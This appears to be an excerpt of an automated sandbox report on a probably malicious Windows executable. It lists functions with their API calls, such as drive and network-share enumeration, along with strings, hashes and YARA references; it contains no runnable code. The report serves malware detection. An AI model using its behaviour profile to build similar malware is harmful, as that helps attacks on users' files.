                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                    • String ID:
                    • API String ID: 3567560977-0
                    • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                    • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                    • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                    • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                    Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    • __lock.LIBCMT ref: 0042594A
                      • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                      • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                      • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                    • _free.LIBCMT ref: 00425970
                      • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                    • __lock.LIBCMT ref: 00425989
                    • ___removelocaleref.LIBCMT ref: 00425998
                    • ___freetlocinfo.LIBCMT ref: 004259B1
                    • _free.LIBCMT ref: 004259C4
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                    • String ID:
                    • API String ID: 626533743-0
                    • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                    • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                    • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                    • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                    Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___from_strstr_to_strchr
                    • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                    • API String ID: 601868998-2416195885
                    • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                    • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                    • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                    • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                    Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: .\crypto\buffer\buffer.c$g9F
                    • API String ID: 2102423945-3653307630
                    • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                    • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                    • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                    • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                    Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                    • __getptd_noexit.LIBCMT ref: 004C5D3D
                      • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                      • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                      • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                      • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                      • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                    • __calloc_crt.LIBCMT ref: 004C5D60
                    • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                    • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                    Strings
                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                    • API String ID: 3123740607-798102604
                    • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                    • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                    • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                    • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                    Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _fprintf_memset
                    • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                    • API String ID: 3021507156-3399676524
                    • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                    • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                    • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                    • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                    Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Path$AppendFolder
                    • String ID: bowsakkdestx.txt
                    • API String ID: 29327785-2616962270
                    • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                    • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                    • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                    • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                    Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                    • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                    • UpdateWindow.USER32(00000000), ref: 0041BAC5
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$CreateShowUpdate
                    • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                    • API String ID: 2944774295-3503800400
                    • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                    • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                    • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                    • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                    Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                    Download Yara Rule
                    APIs
                    • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                    • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                    • _memset.LIBCMT ref: 00410C4C
                    • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Enum$AllocGlobalOpenResource_memset
                    • String ID:
                    • API String ID: 364255426-0
                    • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                    • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                    • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                    • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                    Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                    Download Yara Rule
                    APIs
                    • __getenv_helper_nolock.LIBCMT ref: 00441726
                    • _strlen.LIBCMT ref: 00441734
                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                    • _strnlen.LIBCMT ref: 004417BF
                    • __lock.LIBCMT ref: 004417D0
                    • __getenv_helper_nolock.LIBCMT ref: 004417DB
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                    • String ID:
                    • API String ID: 2168648987-0
                    • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                    • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                    • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                    • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                    Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                    Download Yara Rule
                    APIs
                    • GetLogicalDrives.KERNEL32 ref: 00410A75
                    • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                    • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                    • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                    • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                    • String ID:
                    • API String ID: 2560635915-0
                    • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                    • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                    • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                    • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                    Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _malloc.LIBCMT ref: 0043B70B
                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00770000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                    • _free.LIBCMT ref: 0043B71E
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap_free_malloc
                    • String ID:
                    • API String ID: 1020059152-0
                    • Opcode ID: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                    • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                    • Opcode Fuzzy Hash: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                    • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                    Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                    • DispatchMessageW.USER32(?), ref: 0041F0B6
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                    • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                    • String ID:
                    • API String ID: 1380987712-0
                    • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                    • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                    • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                    • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                    Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                    • DispatchMessageW.USER32(?), ref: 0041E546
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                    • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                    • String ID:
                    • API String ID: 1380987712-0
                    • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                    • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                    • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                    • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                    Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                    • DispatchMessageW.USER32(?), ref: 0041FA7B
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                    • String ID:
                    • API String ID: 1380987712-0
                    • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                    • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                    • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                    • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                    Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                    • DispatchMessageW.USER32(?), ref: 0041FE2B
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                    • String ID:
                    • API String ID: 1380987712-0
                    • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                    • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                    • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                    • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                    Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove
                    • String ID: invalid string position$string too long
                    • API String ID: 4104443479-4289949731
                    • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                    • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                    • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                    • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                    Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove
                    • String ID: invalid string position$string too long
                    • API String ID: 4104443479-4289949731
                    • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                    • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                    • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                    • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                    Function 00425341 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsnlen
                    • String ID: U
                    • API String ID: 3628947076-3372436214
                    • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                    • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                    • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                    • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                    Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
